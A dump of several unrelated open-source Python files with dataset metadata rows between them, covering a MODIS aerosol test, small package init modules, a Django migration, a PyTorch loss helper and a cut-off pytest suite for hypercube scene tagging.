(np.float32(0.00106935936492), np.float32(0.0864628851414), np.float64(0.0409857227996), 54736), 'Asymmetry_Factor_Average_Ocean_mod04': (np.int16(556), np.int16(748), np.float64(668.092664093), 191576), 'Critical_Reflectance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Backscattering_Ratio_Average_Ocean_mod04': (np.int16(191), np.int16(273), np.float64(223.486486486), 191576), 'Optical_Depth_Small_Best_Ocean_mod04': (np.int16(0), np.int16(125), np.float64(22.6602316602), 191576), 'Mass_Concentration_Ocean_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Sensor_Azimuth_mod04': (np.int16(-9117), np.int16(14753), np.float64(2321.49684364), 0), 'Sensor_Zenith_mod04': (np.int16(30), np.int16(6511), np.float64(3130.63108922), 0), 'QualityWeight_Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Quality_Assurance_Ocean_mod04': (np.int8(-128), np.int8(119), np.float64(-74.2057655162), 109586), 'Cloud_Fraction_Ocean_mod04': (np.int16(17), np.int16(94), np.float64(72.1621621622), 27368), 'Continental_Optical_Depth_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Transmitted_Flux_Best_Ocean_mod04': (np.int16(783), np.int16(992), np.float64(926.474903475), 191576), 'Solution_2_Land_mod04': (np.int16(470), np.int16(660), np.float64(560.0), 0), 'Solar_Azimuth_mod04': (np.int16(-17997), np.int16(17997), np.float64(1609.12260536), 0), 'Mean_Reflectance_Ocean_mod04': (np.int16(42), np.int16(2896), np.float64(870.158301158), 191576), 'Latitude_mod04': (np.float32(55.5567932129), np.float32(78.8707275391), np.float32(67.7115859985), 0), 'Solution_Index_mod04': (np.int16(1), np.int16(9), np.float64(5.0), 0), 'Scattering_Angle_mod04': (np.int16(6912), np.int16(14469), np.float64(10445.5381135), 0), 'Reflected_Flux_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 82215), 'Effective_Optical_Depth_Best_Ocean_mod04': (np.int16(9), np.int16(181), np.float64(55.5714285714), 191576), 
'Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888), 'Number_Pixels_Percentile_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 54810), 'Optical_Depth_Ratio_Small_Land_mod04': (np.ma.masked, np.ma.masked, np.ma.masked, 27405), 'Solution_3_Land_mod04': (np.int16(470), np.int16(2130), np.float64(1086.66666667), 0), 'Solution_1_Land_mod04': (np.int16(470), np.int16(660), np.float64(565.0), 0), 'Effective_Radius_Ocean_mod04': (np.int16(179), np.int16(602), np.float64(317.554054054), 54736), 'Optical_Depth_Large_Average_Ocean_mod04': (np.int16(8), np.int16(74), np.float64(31.4362934363), 191576), 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': (np.int16(322), np.int16(742), np.float64(580.189189189), 54736), 'Error_Path_Radiance_Land_mod04': (np.int16(0), np.int16(0), np.float64(0.0), 53888)}
def get_coord_dims(var):
    """Return the names of *var*'s dimensions that are also variables
    in the owning file (i.e. its coordinate dimensions), in order."""
    coord_dims = []
    for name in var.dimensions:
        if name in var.file.variables.keys():
            coord_dims.append(name)
    return coord_dims
# Script entry point: delegates to `ut.main()` — `ut` is imported earlier
# in the file (presumably unittest or a local test harness; not visible
# in this chunk — confirm against the file header).
if __name__ == '__main__':
    ut.main()
| 473.287671
| 7,284
| 0.721187
| 9,500
| 69,100
| 4.873053
| 0.047368
| 0.056552
| 0.038407
| 0.053571
| 0.882274
| 0.838446
| 0.796043
| 0.765931
| 0.740161
| 0.707413
| 0
| 0.110033
| 0.112489
| 69,100
| 145
| 7,285
| 476.551724
| 0.644838
| 0
| 0
| 0.092308
| 0
| 0.015385
| 0.563864
| 0.30809
| 0
| 0
| 0
| 0
| 0.107692
| 1
| 0.076923
| false
| 0
| 0.038462
| 0.007692
| 0.130769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ae08e86e4a15e2484d92fbe02e4e6b6b013809a7
| 90
|
py
|
Python
|
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
fact-bounty-flask/api_es/__init__.py
|
ganeshpatro321/fact-Bounty
|
2f178dffa4a68de668ea584034ec8de9bb39db55
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint
# Blueprint under which this package's API endpoints are grouped.
api_es = Blueprint('api_es', __name__)
# Imported after the blueprint exists; presumably `routes` registers its
# view functions on `api_es` (standard Flask blueprint pattern — confirm).
from . import routes  # noqa: E402,F401
| 15
| 38
| 0.766667
| 13
| 90
| 4.846154
| 0.615385
| 0.380952
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 90
| 5
| 39
| 18
| 0.828947
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ae40233e94aa27179906864ceae69eb9a15666e9
| 78
|
py
|
Python
|
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | null | null | null |
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | null | null | null |
lspreader/__init__.py
|
noobermin/lspreader
|
b4989ba32507fdcf87cc226ba93422639ed5c5fb
|
[
"MIT"
] | 1
|
2015-12-28T20:17:22.000Z
|
2015-12-28T20:17:22.000Z
|
# Re-export the reader entry points at package level.
# (Removed the C-style trailing semicolons; they are no-ops in Python.)
from .lspreader import read
from .lspreader import readgridp4, readregionsp4
| 26
| 48
| 0.833333
| 9
| 78
| 7.222222
| 0.666667
| 0.4
| 0.584615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.102564
| 78
| 2
| 49
| 39
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ae4052b588f3324b31251f5c0ab20b64d3538cb7
| 4,429
|
py
|
Python
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 4
|
2020-11-06T04:42:07.000Z
|
2021-07-28T18:09:26.000Z
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 38
|
2020-08-19T20:20:08.000Z
|
2022-01-23T03:22:51.000Z
|
server/ahj_app/migrations/0003_auto_20210312_1830.py
|
btansy/ahj-registry
|
b5340c7474f610964e828588572846ce4fb088aa
|
[
"MIT"
] | 8
|
2020-05-22T17:04:16.000Z
|
2021-01-15T19:14:36.000Z
|
# Generated by Django 3.1.3 on 2021-03-12 18:30
from django.db import migrations
class Migration(migrations.Migration):
    """Drop a batch of columns from the four *temp tables added in 0002."""

    dependencies = [
        ('ahj_app', '0002_citytemp_countytemp_cousubtemp_statetemp'),
    ]

    # One RemoveField per (model, column) pair, in the exact order the
    # original migration listed them.
    operations = [
        migrations.RemoveField(model_name=model_name, name=field_name)
        for model_name, field_name in (
            ('citytemp', 'CLASSFP'),
            ('citytemp', 'FUNCSTAT'),
            ('citytemp', 'LSAD'),
            ('citytemp', 'MTFCC'),
            ('citytemp', 'PCICBSA'),
            ('citytemp', 'PCINECTA'),
            ('citytemp', 'PLACEFP'),
            ('citytemp', 'PLACENS'),
            ('citytemp', 'STATEABBR'),
            ('countytemp', 'CBSAFP'),
            ('countytemp', 'CLASSFP'),
            ('countytemp', 'COUNTYFP'),
            ('countytemp', 'COUNTYNS'),
            ('countytemp', 'CSAFP'),
            ('countytemp', 'FUNCSTAT'),
            ('countytemp', 'LSAD'),
            ('countytemp', 'METDIVFP'),
            ('countytemp', 'MTFCC'),
            ('countytemp', 'STATEABBR'),
            ('cousubtemp', 'CLASSFP'),
            ('cousubtemp', 'CNECTAFP'),
            ('cousubtemp', 'COUNTYFP'),
            ('cousubtemp', 'COUSUBFP'),
            ('cousubtemp', 'COUSUBNS'),
            ('cousubtemp', 'FUNCSTAT'),
            ('cousubtemp', 'LSAD'),
            ('cousubtemp', 'MTFCC'),
            ('cousubtemp', 'NCTADVFP'),
            ('cousubtemp', 'NECTAFP'),
            ('cousubtemp', 'STATEABBR'),
            ('statetemp', 'DIVISION'),
            ('statetemp', 'FUNCSTAT'),
            ('statetemp', 'LSAD'),
            ('statetemp', 'MTFCC'),
            ('statetemp', 'REGION'),
            ('statetemp', 'STATEABBR'),
            ('statetemp', 'STATEFP'),
            ('statetemp', 'STATENS'),
            ('statetemp', 'STUSPS'),
        )
    ]
| 26.052941
| 69
| 0.489275
| 303
| 4,429
| 7.006601
| 0.174917
| 0.385775
| 0.477626
| 0.551107
| 0.861988
| 0.861988
| 0.052756
| 0.052756
| 0
| 0
| 0
| 0.007143
| 0.399413
| 4,429
| 169
| 70
| 26.207101
| 0.790977
| 0.01016
| 0
| 0.846626
| 1
| 0
| 0.156321
| 0.010269
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006135
| 0
| 0.02454
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae5fc2cda0ba8429e580d74b929dba2489efc2f3
| 156
|
py
|
Python
|
src/sage/manifolds/all.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | 2
|
2018-06-30T01:37:35.000Z
|
2018-06-30T01:37:39.000Z
|
src/sage/manifolds/all.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
# Bind the manifold entry points lazily: the names become available here
# without importing the (heavy) sage.manifolds modules until first use.
lazy_import('sage.manifolds.manifold', 'Manifold')
lazy_import('sage.manifolds.utilities', 'set_axes_labels')
| 39
| 58
| 0.820513
| 22
| 156
| 5.545455
| 0.5
| 0.327869
| 0.262295
| 0.377049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 156
| 3
| 59
| 52
| 0.824324
| 0
| 0
| 0
| 0
| 0
| 0.448718
| 0.301282
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
881c6d54ec83dc2c3ca727770b3197668296da91
| 168
|
py
|
Python
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 69
|
2019-02-25T00:17:53.000Z
|
2022-03-31T17:26:48.000Z
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 68
|
2018-07-20T09:01:01.000Z
|
2022-03-31T16:28:36.000Z
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 24
|
2018-10-02T04:32:10.000Z
|
2021-11-10T08:24:17.000Z
|
# Re-export the patched sphinx-gallery hooks from their submodules.
# NOTE(review): the alt_*/_save_* names suggest these are local overrides
# of the corresponding upstream sphinx-gallery functions — confirm where
# they are monkey-patched in.
from .sphinx_gallery_binder import alt_gen_binder_rst
from .sphinx_gallery_gen_rst import _save_rst_example
from .sphinx_gallery_scrapers import alt_matplotlib_scraper
| 42
| 59
| 0.910714
| 26
| 168
| 5.307692
| 0.5
| 0.217391
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 168
| 3
| 60
| 56
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88253588293386909abce282eac538db36349cdb
| 134
|
py
|
Python
|
step3_train_model/pytorch/model/loss.py
|
weir12/DENA
|
0653826b4853264af75f7400e309e9e840f085c0
|
[
"MIT"
] | 12
|
2021-08-21T07:45:46.000Z
|
2022-03-12T03:12:49.000Z
|
step3_train_model/pytorch/model/loss.py
|
q1134269149/DENA
|
c3cc7e897dd12143ddb06536e3d371f7fcaf3ded
|
[
"Apache-2.0"
] | 7
|
2022-01-21T16:18:40.000Z
|
2022-03-31T06:43:28.000Z
|
step3_train_model/pytorch/model/loss.py
|
q1134269149/DENA
|
c3cc7e897dd12143ddb06536e3d371f7fcaf3ded
|
[
"Apache-2.0"
] | 5
|
2021-08-25T05:07:21.000Z
|
2022-02-02T09:31:46.000Z
|
import torch.nn.functional as F
import torch.nn as nn
def CE_loss(output, target):
    """Mean cross-entropy loss between raw logits and class indices.

    Args:
        output: unnormalized logits, shape (N, C).
        target: integer class indices, shape (N,).

    Returns:
        Scalar loss tensor (mean reduction, the default).
    """
    # Use the functional form instead of constructing a fresh
    # nn.CrossEntropyLoss module on every call; the two are
    # numerically identical with default arguments.
    return F.cross_entropy(output, target)
| 19.142857
| 48
| 0.753731
| 21
| 134
| 4.761905
| 0.619048
| 0.22
| 0.26
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 6
| 49
| 22.333333
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
88445bd71223a8b9d623a163be5be813237710b9
| 59,372
|
py
|
Python
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import copy
from hypercube import Hypercube
from hypercube.hypercubes import update_floor_and_walls, update_scene_objects
class MockHypercube(Hypercube):
    """Minimal concrete Hypercube used to exercise base-class behavior."""

    def __init__(self):
        # 'mock' category with empty body/role templates; sceneInfo starts
        # with an empty 'all' list.
        super().__init__('mock', {}, {
            'category': 'mock',
            'domainsInfo': {},
            'sceneInfo': {'all': []}
        })

    def _create_scenes(self, body_template, goal_template):
        # Single scene: a copy of the body template with the goal
        # template spliced in under 'goal'.
        return [{**body_template, **{'goal': goal_template}}]

    def _get_training_scenes(self):
        # All scenes are training scenes for this mock.
        return self._scenes
def create_tags_test_object_1():
    """Build the small 'test_sphere' object record used by the tag tests."""
    debug_info = {
        'dimensions': {'x': 0.1, 'y': 0.1, 'z': 0.1},
        'info': ['tiny', 'light', 'blue', 'plastic', 'ball'],
        'goalString': 'tiny light blue plastic ball',
        'materialCategory': ['plastic'],
        'untrainedCategory': False,
        'untrainedColor': False,
        'untrainedCombination': False,
        'untrainedShape': False,
        'untrainedSize': False,
    }
    shows = [{
        'stepBegin': 0,
        'position': {'x': 0, 'y': 0, 'z': 0},
    }]
    return {
        'id': 'test_sphere',
        'type': 'sphere',
        'mass': 0.5,
        'materials': ['test_material'],
        'moveable': True,
        'pickupable': True,
        'salientMaterials': ['plastic'],
        'debug': debug_info,
        'shows': shows,
    }
def create_tags_test_object_2():
    """Build the 'test_cube' object record used by the tag tests."""
    debug_info = {
        'dimensions': {'x': 0.5, 'y': 0.5, 'z': 0.5},
        'info': ['medium', 'light', 'yellow', 'plastic', 'cube'],
        'goalString': 'medium light yellow plastic cube',
        'materialCategory': ['plastic'],
        'untrainedCategory': False,
        'untrainedColor': False,
        'untrainedCombination': False,
        'untrainedShape': False,
        'untrainedSize': False,
    }
    shows = [{
        'stepBegin': 0,
        'position': {'x': 1, 'y': 2, 'z': 3},
    }]
    return {
        'id': 'test_cube',
        'type': 'cube',
        'mass': 2.5,
        'materials': ['test_material'],
        'moveable': True,
        'pickupable': True,
        'salientMaterials': ['plastic'],
        'debug': debug_info,
        'shows': shows,
    }
def test_Hypercube_create_scenes_on_init():
    """A Hypercube subclass builds its scene list during __init__."""
    cube = MockHypercube()
    assert len(cube._scenes) == 1
def test_Hypercube_init_scenes():
    """Scenes returned by get_scenes() carry the standard goal sections."""
    cube = MockHypercube()
    goal = cube.get_scenes()[0]['goal']
    for section in ('category', 'domainsInfo', 'objectsInfo', 'sceneInfo'):
        assert section in goal
def test_Hypercube_tags():
    """A single trained, uncontained target produces the full 'trained'
    tag set and count 1."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_multiple_target():
    """Two targets merge both objects' info lists and give count 2."""
    hypercube = MockHypercube()
    target_1 = create_tags_test_object_1()
    target_2 = create_tags_test_object_2()
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(
        scene,
        {'target': [target_1, target_2]}
    )
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 2
    assert scene['goal']['sceneInfo']['count']['target'] == 2
def test_Hypercube_tags_with_obstacle():
    """Target plus obstacle: each role gets its own info list and count."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target', 'obstacle',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['obstacle']) == {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['contained']['obstacle']
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['obstacle']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['obstacle']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 2
    assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_multiple_target_multiple_obstacle():
    """Two targets and two obstacles: per-role counts 2, overall 4."""
    hypercube = MockHypercube()
    target_1 = create_tags_test_object_1()
    target_2 = create_tags_test_object_1()
    obstacle_1 = create_tags_test_object_2()
    obstacle_2 = create_tags_test_object_2()
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(
        scene,
        {
            'target': [target_1, target_2],
            'obstacle': [obstacle_1, obstacle_2]
        }
    )
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target', 'obstacle',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['obstacle']) == {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['contained']['obstacle']
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['obstacle']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['obstacle']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 4
    assert scene['goal']['sceneInfo']['count']['obstacle'] == 2
    assert scene['goal']['sceneInfo']['count']['target'] == 2
def test_Hypercube_tags_with_intuitive_physics_occluder():
    """Occluder wall+pole pair counts as one occluder alongside the target."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    occluder_wall = {'debug': {'info': ['white']}}
    occluder_pole = {'debug': {'info': ['brown']}}
    # NOTE(review): role key below uses spaces but lookups use this
    # underscored tag -- update_scene_objects presumably normalizes the
    # role name; confirm in hypercube.hypercubes.
    occluder_tag = 'intuitive_physics_occluder'
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(
        scene,
        {
            'target': [target],
            'intuitive physics occluder': [occluder_wall, occluder_pole]
        }
    )
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target', 'intuitive physics occluder',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'white', 'brown',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo'][occluder_tag]) == {
        'white', 'brown'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['contained'][occluder_tag]
    assert not scene['goal']['sceneInfo']['contained']['target']
